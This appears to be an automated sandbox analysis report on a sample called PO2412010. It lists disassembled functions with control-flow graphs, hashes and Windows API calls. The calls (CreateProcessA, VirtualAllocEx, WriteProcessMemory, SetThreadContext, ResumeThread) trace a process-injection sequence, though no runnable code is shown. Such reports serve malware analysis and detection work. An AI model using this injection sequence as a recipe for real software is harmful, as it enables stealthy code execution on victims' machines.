                                                                        • String ID: U
                                                                        • API String ID: 983334009-3372436214
                                                                        • Opcode ID: dbaeae1af7dce93d1f1145e9063db5ec7cd59ff296f545326821fefda51ac04d
                                                                        • Instruction ID: e59101bb2e23e3e541c667e676494d1b18e9eec2a19e23a4f52f7c0bc1c3734a
                                                                        • Opcode Fuzzy Hash: dbaeae1af7dce93d1f1145e9063db5ec7cd59ff296f545326821fefda51ac04d
                                                                        • Instruction Fuzzy Hash: C8216AB1D103098FDB10DFAAC8857EEBBF4EF48324F14842AD459A7241C778A945CFA0
                                                                        Function 06F92AC7 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1444 6f92ac7-6f92ae7 1445 6f92aef-6f92af1 1444->1445 1446 6f92b0b-6f92b78 call 6f920d8 1445->1446 1447 6f92af3-6f92b08 1445->1447 1456 6f92b7e-6f92b80 1446->1456 1457 6f92c24-6f92c3b 1446->1457 1458 6f92cb0-6f92d57 1456->1458 1459 6f92b86-6f92b91 call 6f922f0 1456->1459 1467 6f92c3d-6f92c3f 1457->1467 1468 6f92c41 1457->1468 1493 6f92d59-6f92d5f 1458->1493 1494 6f92d60-6f92d81 1458->1494 1465 6f92bae-6f92bb2 1459->1465 1466 6f92b93-6f92b95 1459->1466 1471 6f92c11-6f92c1a 1465->1471 1472 6f92bb4-6f92bc8 call 6f92418 1465->1472 1469 6f92ba0-6f92bab call 6f916cc 1466->1469 1470 6f92b97-6f92b9e 1466->1470 1474 6f92c46-6f92c48 1467->1474 1468->1474 1469->1465 1470->1465 1482 6f92bca-6f92bdb call 6f916cc 1472->1482 1483 6f92bde-6f92be2 1472->1483 1479 6f92c4a-6f92c76 1474->1479 1480 6f92c7d-6f92ca9 1474->1480 1479->1480 1480->1458 1482->1483 1487 6f92bea-6f92c03 1483->1487 1488 6f92be4 1483->1488 1496 6f92c0e 1487->1496 1497 6f92c05 1487->1497 1488->1487 1493->1494 1496->1471 1497->1496
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (cq$Hcq
                                                                        • API String ID: 0-4250889185
                                                                        • Opcode ID: 7cf3a04179317e50250602a52aa7c5b477992a2c9ef4a9864fd7dc22a0317663
                                                                        • Instruction ID: d5154b411d73d735c5ff27dc6facb74f920430871e9c1b33bd8177dd87113f3b
                                                                        • Opcode Fuzzy Hash: 7cf3a04179317e50250602a52aa7c5b477992a2c9ef4a9864fd7dc22a0317663
                                                                        • Instruction Fuzzy Hash: 91719E31E102189FEB54EF69D8446AEBBF6EFC8310F148429D505E7384EB389E05CBA5
                                                                        Function 06F9ECE0 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1555 6f9ece0-6f9ed03 1556 6f9ed0a-6f9ed4a 1555->1556 1557 6f9ed05 1555->1557 1558 6f9eea7-6f9eec6 call 6f9ecb0 1556->1558 1557->1556 1572 6f9eea1 1558->1572 1573 6f9ed55-6f9ed5a 1558->1573 1572->1558 1574 6f9ed5c-6f9ed5d 1573->1574 1575 6f9ed5f-6f9ee5b 1573->1575 1574->1575 1578 6f9edf1-6f9edf5 1575->1578 1579 6f9ee45-6f9eef0 1578->1579 1580 6f9edf7-6f9edf8 1578->1580 1579->1578 1591 6f9ede0 call 72e016c 1580->1591 1592 6f9ede0 call 72e047b 1580->1592 1593 6f9ede0 call 72e0147 1580->1593 1594 6f9ede0 call 72e0027 1580->1594 1595 6f9ede0 call 72e0040 1580->1595 1590 6f9ede6-6f9edf0 1591->1590 1592->1590 1593->1590 1594->1590 1595->1590
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te_q$Te_q
                                                                        • API String ID: 0-1615656442
                                                                        • Opcode ID: 0620f4f19c52370d0c2c3b8efe5c76261fdcdf3ed87bbd487c32387fbebd33f7
                                                                        • Instruction ID: ed151f1cb6480b3bb54b74a935520557a59b10cc8be5b037c605f89501e2b05b
                                                                        • Opcode Fuzzy Hash: 0620f4f19c52370d0c2c3b8efe5c76261fdcdf3ed87bbd487c32387fbebd33f7
                                                                        • Instruction Fuzzy Hash: 6C61C575E04218CFEF48DFA9C9846EDBBB6FF89300F10942AD419AB355DB715905CB60
                                                                        Function 06F99250 Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1645 6f99250-6f9925d 1646 6f991fc-6f99240 1645->1646 1647 6f9925f-6f99276 1645->1647 1646->1645 1649 6f9927b-6f9927e 1647->1649 1650 6f99333 1647->1650 1652 6f99280 1649->1652 1653 6f99287-6f99331 1649->1653 1651 6f99338-6f99342 1650->1651 1657 6f9934d-6f993ae 1651->1657 1652->1650 1652->1653 1654 6f99315-6f99329 1652->1654 1655 6f992b7-6f992d5 1652->1655 1665 6f9932a 1653->1665 1663 6f992dc-6f992e9 1655->1663 1664 6f992d7-6f992da 1655->1664 1657->1665 1666 6f992eb-6f992fa 1663->1666 1664->1666 1665->1649 1671 6f992fc-6f99302 1666->1671 1672 6f99312 1666->1672 1674 6f99304 1671->1674 1675 6f99306-6f99308 1671->1675 1672->1654 1674->1672 1675->1672
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8cq$8cq
                                                                        • API String ID: 0-1115341050
                                                                        • Opcode ID: 0a267161158f4135be5e7c2862f947ac0c8b87fe0efa10c9b5d9abac142ea9ed
                                                                        • Instruction ID: 7118abff37d478319307ecd1fa25abb52362eb3a78210fec69eeae8300bffe6d
                                                                        • Opcode Fuzzy Hash: 0a267161158f4135be5e7c2862f947ac0c8b87fe0efa10c9b5d9abac142ea9ed
                                                                        • Instruction Fuzzy Hash: 7731E976E08205DFFF849FA484469BE77B9EB85200B5E405ED54AE72C5C6B1890287F2
                                                                        Function 06F982D0 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1685 6f982d0-6f98335 call 6f9839f 1689 6f9833b-6f9833d 1685->1689 1693 6f982fc-6f9830b 1689->1693 1694 6f982e6-6f982ec 1689->1694 1697 6f9830d-6f9831a 1693->1697 1698 6f9833f-6f9851f 1693->1698 1695 6f982ee 1694->1695 1696 6f982f0-6f982f2 1694->1696 1695->1693 1696->1693 1697->1698 1699 6f9831c-6f98332 1697->1699
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1439007633.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6f90000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $_q$$_q
                                                                        • API String ID: 0-458585787
                                                                        • Opcode ID: f4b40ef9edb8370c8a9c14f7c61cec0a1aea09ed799d38aaa5316f71eb13ec96
                                                                        • Instruction ID: 23eb2df518e005b10b9ad485054ae718928d918570f6154ed47116e93e9e8e76
                                                                        • Opcode Fuzzy Hash: f4b40ef9edb8370c8a9c14f7c61cec0a1aea09ed799d38aaa5316f71eb13ec96
                                                                        • Instruction Fuzzy Hash: 8811E272D09245CFFB94DB388905A66BBB8BB07280F0449ABA02AD7106D7708845C7F6
                                                                        Function 072E5C3D Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1843 72e5c3d-72e5cdd 1845 72e5cdf-72e5ce9 1843->1845 1846 72e5d16-72e5d36 1843->1846 1845->1846 1847 72e5ceb-72e5ced 1845->1847 1851 72e5d6f-72e5d9e 1846->1851 1852 72e5d38-72e5d42 1846->1852 1849 72e5cef-72e5cf9 1847->1849 1850 72e5d10-72e5d13 1847->1850 1853 72e5cfd-72e5d0c 1849->1853 1854 72e5cfb 1849->1854 1850->1846 1862 72e5dd7-72e5e91 CreateProcessA 1851->1862 1863 72e5da0-72e5daa 1851->1863 1852->1851 1855 72e5d44-72e5d46 1852->1855 1853->1853 1856 72e5d0e 1853->1856 1854->1853 1857 72e5d48-72e5d52 1855->1857 1858 72e5d69-72e5d6c 1855->1858 1856->1850 1860 72e5d56-72e5d65 1857->1860 1861 72e5d54 1857->1861 1858->1851 1860->1860 1864 72e5d67 1860->1864 1861->1860 1874 72e5e9a-72e5f20 1862->1874 1875 72e5e93-72e5e99 1862->1875 1863->1862 1865 72e5dac-72e5dae 1863->1865 1864->1858 1867 72e5db0-72e5dba 1865->1867 1868 72e5dd1-72e5dd4 1865->1868 1869 72e5dbe-72e5dcd 1867->1869 1870 72e5dbc 1867->1870 1868->1862 1869->1869 1871 72e5dcf 1869->1871 1870->1869 1871->1868 1885 72e5f22-72e5f26 1874->1885 1886 72e5f30-72e5f34 1874->1886 1875->1874 1885->1886 1887 72e5f28 1885->1887 1888 72e5f36-72e5f3a 1886->1888 1889 72e5f44-72e5f48 1886->1889 1887->1886 1888->1889 1890 72e5f3c 1888->1890 1891 72e5f4a-72e5f4e 1889->1891 1892 72e5f58-72e5f5c 1889->1892 1890->1889 1891->1892 1893 72e5f50 1891->1893 1894 72e5f6e-72e5f75 1892->1894 1895 72e5f5e-72e5f64 1892->1895 1893->1892 1896 72e5f8c 1894->1896 1897 72e5f77-72e5f86 1894->1897 1895->1894 1899 72e5f8d 1896->1899 1897->1896 1899->1899
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072E5E7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 1232eb3d970246bda773ba4039feb3fe7b0bbab873d5d262468892c34924010a
                                                                        • Instruction ID: 9a455305636ac9c5c3fbe0e683c52dec9258ccb63f6e525a1c53267da5f8e208
                                                                        • Opcode Fuzzy Hash: 1232eb3d970246bda773ba4039feb3fe7b0bbab873d5d262468892c34924010a
                                                                        • Instruction Fuzzy Hash: 1EA18AB1D2021ACFDB20CF69CC417EDBBB6BF49314F5481AAE818A7240DB749995CF91
                                                                        Function 072E5C48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072E5E7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: af1bcbeba353eb36bb83c96ae2528a81affdc1188860e07b7678f6c2ab791185
                                                                        • Instruction ID: 7cecd80dece02d340a24d9b58b468bd9159284e7f8cd89d098a3c14f1c485c6c
                                                                        • Opcode Fuzzy Hash: af1bcbeba353eb36bb83c96ae2528a81affdc1188860e07b7678f6c2ab791185
                                                                        • Instruction Fuzzy Hash: 78918BB1D2021ACFDB20CF69CC417EDBBB6BF49314F5481A9E818A7240DB749995CF91
                                                                        Function 00A3B300 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A3B566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 012cb632a11def31160a3017f345e9d11f4543100ad0e16fc1ddfc6050eb27aa
                                                                        • Instruction ID: 03fdef6b65fb8e5dd66248be5b494fc0b8e985f4b45f3a5e64a322daad574d49
                                                                        • Opcode Fuzzy Hash: 012cb632a11def31160a3017f345e9d11f4543100ad0e16fc1ddfc6050eb27aa
                                                                        • Instruction Fuzzy Hash: 2C816870A00B058FD724DF29D04179ABBF2FF48300F10892EE58ADBA55D774E909CBA1
                                                                        Function 00A3590C Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00A359C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: a72203807c95361e5dd9c42012d893c66c2858ea542e688352314fb96ccf95e0
                                                                        • Instruction ID: 9037a75c0b7e20cd017814f74b0d991c06c0b290f4c5a9e861f38b4e65264904
                                                                        • Opcode Fuzzy Hash: a72203807c95361e5dd9c42012d893c66c2858ea542e688352314fb96ccf95e0
                                                                        • Instruction Fuzzy Hash: D741F3B0C00719DBDB24CFA9C8847CDBBF5BF49304F20816AD408AB255DB75A986CF50
                                                                        Function 00A344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 00A359C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 2fb874aa973b23d0dcab8170b0c3d65c9787331245ab0110a8ebf161b67ec367
                                                                        • Instruction ID: 3c7b35d6fd4e0401890e34178e6421ffaa6fac3522f23139749db3c57d9bdf84
                                                                        • Opcode Fuzzy Hash: 2fb874aa973b23d0dcab8170b0c3d65c9787331245ab0110a8ebf161b67ec367
                                                                        • Instruction Fuzzy Hash: 7E41D2B0C00B1DCBDB24DFA9C884B9EBBF5BF49304F20816AD419AB255DB75A945CF90
                                                                        Function 072E59B9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072E5A50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 8ccecb4c23c9fd98c453c4429c7d76919d4174ed3763d7769b84a33121c03a57
                                                                        • Instruction ID: b8e8497c74bd1617e5d18d85a3bf15d5720c6e333a41bae99441688d92fcb4cd
                                                                        • Opcode Fuzzy Hash: 8ccecb4c23c9fd98c453c4429c7d76919d4174ed3763d7769b84a33121c03a57
                                                                        • Instruction Fuzzy Hash: 902146B1D102499FCB10CFA9C985BDEBBF5FF48310F14882AE559A7340D7789954CBA0
                                                                        Function 072E59C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072E5A50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 33cfd6023ede7c9820a7e47e6ffa99722c4a3b104cacb65ff8359ec25f360faf
                                                                        • Instruction ID: de0b078cd4471b3ee875c6f4f3c225e85355fe4cf7f8e2cc7417af4c8b41d516
                                                                        • Opcode Fuzzy Hash: 33cfd6023ede7c9820a7e47e6ffa99722c4a3b104cacb65ff8359ec25f360faf
                                                                        • Instruction Fuzzy Hash: 7D2124B19103599FCB10DFAAC885BDEBBF5FF48314F50842AE919A7240D778A954CBA0
                                                                        Function 072E5AA8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072E5B30
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 703793d388ba0beab66ad40c01f4807a44bf097c7f2e1150b6df1fbf0977ef8c
                                                                        • Instruction ID: 8d8db24bf05f27e7866cd694e7c9fed45282b304fd1878d9aca700046335ed87
                                                                        • Opcode Fuzzy Hash: 703793d388ba0beab66ad40c01f4807a44bf097c7f2e1150b6df1fbf0977ef8c
                                                                        • Instruction Fuzzy Hash: 782127B1C003499FCB10DFAAC881ADEFBF5FF48320F50842AE559A7240D779A545CBA1
                                                                        Function 00A3D090 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A3D78E,?,?,?,?,?), ref: 00A3D84F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 438096174f05295ae9bb31f07cfffcb10cdff6be90cbb7b067daf782cd040b21
                                                                        • Instruction ID: e573b5b716f7ed04f4203a306473b5c2c91abe7099ff0b630ce38cbefb23de6e
                                                                        • Opcode Fuzzy Hash: 438096174f05295ae9bb31f07cfffcb10cdff6be90cbb7b067daf782cd040b21
                                                                        • Instruction Fuzzy Hash: BA21E5B5D00248DFDB10CF9AD584ADEBBF4EB48310F14841AE919B3350D374A944CFA0
                                                                        Function 072E53F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 072E546E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 983334009-0
                                                                        • Opcode ID: 459b5371cd307b911a24be7e0ca6e9a85f6075b8c643aaf122a1a2f57cdf80f0
                                                                        • Instruction ID: 12647c57c57b052def75b04ae9b078fdccd7676930148e2bc85e5390329b3c59
                                                                        • Opcode Fuzzy Hash: 459b5371cd307b911a24be7e0ca6e9a85f6075b8c643aaf122a1a2f57cdf80f0
                                                                        • Instruction Fuzzy Hash: FF2129B1D103099FDB10DFAAC8857EEBBF4EF48324F54842AD459A7240D778A945CFA1
                                                                        Function 072E5AB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072E5B30
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: e3f9749786915c2744eedd30ac15e22ef89d4cc5b1859ec99d030f26f613c308
                                                                        • Instruction ID: 53a8231345d3e8e5714176a24baba07929b10582039a8a53348db8c58fd4630f
                                                                        • Opcode Fuzzy Hash: e3f9749786915c2744eedd30ac15e22ef89d4cc5b1859ec99d030f26f613c308
                                                                        • Instruction Fuzzy Hash: CC2128B1C003599FCB10DFAAC881ADEFBF5FF48310F50842AE559A7240D7799945CBA0
                                                                        Function 00A3D7C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A3D78E,?,?,?,?,?), ref: 00A3D84F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 59b8e8dcf6622c0f5d36d2009be3d7946b33e4a60f6ee01d655950d221fa1889
                                                                        • Instruction ID: 61bade7af6967a2e97a7a80a51b352b5e7421ca9bc1d78cd2d01147298a23698
                                                                        • Opcode Fuzzy Hash: 59b8e8dcf6622c0f5d36d2009be3d7946b33e4a60f6ee01d655950d221fa1889
                                                                        • Instruction Fuzzy Hash: 3C21EEB5D00249EFDB10CFA9D584ADEBBF5FB48320F14842AE919A3210D378A955CFA5
                                                                        Function 072E58F9 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072E596E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: ef99683ab1975717d459ef355c2440aa98610e435026470ab97fb784dac1ec5d
                                                                        • Instruction ID: 76778e3c23d5925eca783a7a6d54b23d66f12a64b971f8801564d59a8a845dcf
                                                                        • Opcode Fuzzy Hash: ef99683ab1975717d459ef355c2440aa98610e435026470ab97fb784dac1ec5d
                                                                        • Instruction Fuzzy Hash: 32116A728102499FCB10DFA9C944AEFFFF5EF88324F14881AD519A7250C775A954CFA0
                                                                        Function 072E5900 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 072E596E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: da5099d546d04dc8606dac2f50c6e08fa0e52be9bbc37f3a1d6407f5ad7fd65d
                                                                        • Instruction ID: 6295c72d4871648b7f4b607d94abbc05932a5a28ef0c1a3ae764cd072e4d7905
                                                                        • Opcode Fuzzy Hash: da5099d546d04dc8606dac2f50c6e08fa0e52be9bbc37f3a1d6407f5ad7fd65d
                                                                        • Instruction Fuzzy Hash: E81137B19002499FCB10DFAAC845ADFFFF5EF88324F10881AE519A7250C779A954CFA0
                                                                        Function 072E5338 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 030c478fc58ea61621660368f1fff13fbbba70e516b828b477fa5f29687d9241
                                                                        • Instruction ID: a1d1753438ef0623fedfd7fa3197de7bf7fba9f668a4f506d0aeffd648bfb1d0
                                                                        • Opcode Fuzzy Hash: 030c478fc58ea61621660368f1fff13fbbba70e516b828b477fa5f29687d9241
                                                                        • Instruction Fuzzy Hash: 0C1146B1D102498FCB20DFAAC9457DEFBF4EF88324F24881AD419B7240D779A945CBA0
                                                                        Function 072E5340 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: eab98b95ca48c022c02b6c26836bedcf750f1c7b2210afd2878fae935b5ef2bf
                                                                        • Instruction ID: 84b2ca10cf994c59be52d5ba6388abdab0d368cb0ebfc35010497b90121d75a2
                                                                        • Opcode Fuzzy Hash: eab98b95ca48c022c02b6c26836bedcf750f1c7b2210afd2878fae935b5ef2bf
                                                                        • Instruction Fuzzy Hash: 2B113AB1D003498FCB20DFAAC8457DEFBF8AF88324F10841AD419A7240C7796945CBA0
                                                                        Function 00A3B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A3B566
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1431880273.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: ae183ee99250c6b0b103f56cfff1b5229884852b1bf027386d95b6d226559e68
                                                                        • Instruction ID: 782a668cd4b58591f6d80cfaed01c5f5cd9fc50d7017a06c093af5e60f18e353
                                                                        • Opcode Fuzzy Hash: ae183ee99250c6b0b103f56cfff1b5229884852b1bf027386d95b6d226559e68
                                                                        • Instruction Fuzzy Hash: C211EDB6C007498FCB10DFAAD444ADEFBF5AB88320F10842AD929B7610D379A545CFA1
                                                                        Function 072E8171 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 072E81D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1440055845.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72e0000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
